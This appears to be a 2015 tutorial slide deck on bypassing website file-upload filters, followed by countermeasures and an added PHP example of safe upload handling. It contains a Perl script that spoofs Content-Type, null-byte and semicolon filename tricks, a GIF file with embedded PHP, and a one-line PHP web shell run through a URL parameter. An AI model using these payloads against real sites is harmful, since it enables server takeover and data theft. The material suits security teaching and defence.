BYPASS FILE UPLOAD RESTRICTIONS ON WEBSITES AND SECURITY MEASURES By K. Subramanian K. R. Mukesh

Jun 08, 2015

Mukesh Kr

File upload

• Necessity
• Social networking websites, blogs, file sharing, etc.
• Web developers do not consider the threats
• Files should be sanitized
• If not, leads to local file inclusion and hacking
• Filtering mechanisms

Methods of filtering

Content-Type verification

• HTTP POST – MIME type

    Content-Disposition: form-data; name="uploaded file []"; filename="18.jpg"\r\n
    Content-Type: image/jpeg\r\n
    \r\n
    <file content>

• To bypass this filter, edit the Content-Type to an applicable one.

    #!/usr/bin/perl
    #
    use LWP;
    use HTTP::Request::Common;
    # Build the user agent and send the file as a multipart/form-data POST.
    $ua = LWP::UserAgent->new;
    $res = $ua->request(POST 'http://example.com/upload.PHP',
        Content_Type => 'form-data',
        Content => [
            # The per-part header sets the MIME type the client declares.
            userfile => ["sh.PHP", "sh.PHP", "Content-Type" => "application/pdf"],
        ],
    );
    # Print the server's response.
    print $res->as_string();

An easy way – Tamper data

• Tamper Data – a Mozilla add-on that allows the POST data to be modified before it is submitted

Filename extension verification

• Check the extension of the file
• Filter out malicious extensions

    $blacklist = array(".php", ".phtml", ".php3", ".php4");

• To bypass this, use NULL BYTES in the filename

    sh.php%00.pdf
    (or)
    sh.asp;xx.pdf

• While uploading, extension is .pdf
• When accessed, delivered to PHP interpreter

File content verification

• Applicable to image files

    $imageinfo = getimagesize($_FILES['userfile']['tmp_name']);

• To bypass this, manually craft an image file with embedded PHP code

    Content-Type: image/gif
    GIF89a(...some binary data...)<?PHP System($_GET['command']);?>(....binary data...)

• The PHP interpreter executes the PHP code even though it sits inside a garbage of binary values

A Simple Demonstration Towards Bypassing these Filters

Worst case scenario

• Local file inclusion – PHP shell upload
• Simple PHP shell:

    <?php System($_GET['command']);?>

• Executes commands on remote server

    www.example.com/uploads/sh.php?command='ifconfig'

• Entire control of the server – rooting it
• Defacements, database access, credential information theft, etc.

Security Measures

• Preventing direct access to the uploaded files

    $uploaddir = '/var/spool/uploads/'; # Outside of the web root

• Block web access using .htaccess file

    IndexIgnore */*

• Overhead to read and write
• Sometimes leads to potential directory traversal attacks

Random file name implementation

• Prevents attacker knowing the name of the file uploaded

• Map the names in the database

    $res = $db->query("INSERT INTO uploads SET name=?,original_name=?");

• Query while reading
• A little overhead, but secure
• Think again, leads to SQL injection
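
The measures from the last two slides (storage outside the web root, random names mapped in a database) combined with allow-list checks on the name and content, as an added example that is not code from the original slides. The function names vet_upload and store_upload, the table columns and the sample inputs are assumptions; SQLite and the temp directory stand in for the real database and /var/spool/uploads/, and a live handler would call move_uploaded_file() on the tmp_name instead of file_put_contents().

```php
<?php // Added example. vet_upload, store_upload and the table layout are assumptions.
const ALLOWED = ['jpg' => 'image/jpeg', 'png' => 'image/png',
                 'gif' => 'image/gif',  'pdf' => 'application/pdf'];
function vet_upload(string $clientName, string $bytes): array
{
    // Refuse NUL bytes, ';' and path separators outright rather than stripping them.
    if (preg_match('/[\x00;\/\\\\]/', $clientName)) {
        throw new InvalidArgumentException('illegal character in file name');
    }
    // Allow-list the final extension; a blacklist has to anticipate every handler mapping.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new InvalidArgumentException('extension not allowed');
    }
    // Sniff the type from the bytes; the client-supplied Content-Type is never consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if ($mime !== ALLOWED[$ext]) {
        throw new InvalidArgumentException("content sniffed as $mime");
    }
    // Server-chosen random name; the extension is the allow-list key, not client text.
    return [bin2hex(random_bytes(16)) . '.' . $ext, $mime];
}

function store_upload(PDO $db, string $dir, string $clientName, string $bytes): string
{
    [$stored, $mime] = vet_upload($clientName, $bytes);
    file_put_contents("$dir/$stored", $bytes, LOCK_EX);
    // Bound parameters keep the attacker-controlled original name out of the SQL text.
    $db->prepare('INSERT INTO uploads (name, original_name, mime) VALUES (?, ?, ?)')
       ->execute([$stored, $clientName, $mime]);
    return $stored;
}
// Demo with constructed inputs: temp dir and in-memory SQLite are stand-ins.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE uploads (name TEXT PRIMARY KEY, original_name TEXT, mime TEXT)');
$samples = [
    "o'brien.pdf"   => "%PDF-1.4\n1 0 obj\n<<>>\nendobj\n",
    "sh.php\0.pdf"  => "%PDF-1.4\n",
    'sh.asp;xx.pdf' => "%PDF-1.4\n",
    'notes.phtml'   => 'plain text',
    'picture.pdf'   => "GIF89a\x01\x00\x01\x00\x00\x00\x00;",
];
foreach ($samples as $name => $bytes) {
    try {
        echo json_encode($name), ' -> stored as ', store_upload($db, sys_get_temp_dir(), $name, $bytes), "\n";
    } catch (InvalidArgumentException $e) {
        echo json_encode($name), ' -> rejected: ', $e->getMessage(), "\n";
    }
}
```

A crafted image with embedded PHP still passes the content sniff, as the file content verification slide shows. What keeps it inert is that it is written outside the web root under a server-chosen name with an allow-listed extension, so it is only ever returned as data by a download script.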

Conclusion

• Complicated to implement a secure file upload facility

• Many filters = slow response. Leads to Denial Of Service (DOS) attacks

• The best way is to maintain UPLOAD LOGS containing user info such as the IP address, which helps to trace an attacker

• Secure coding practices

Thank you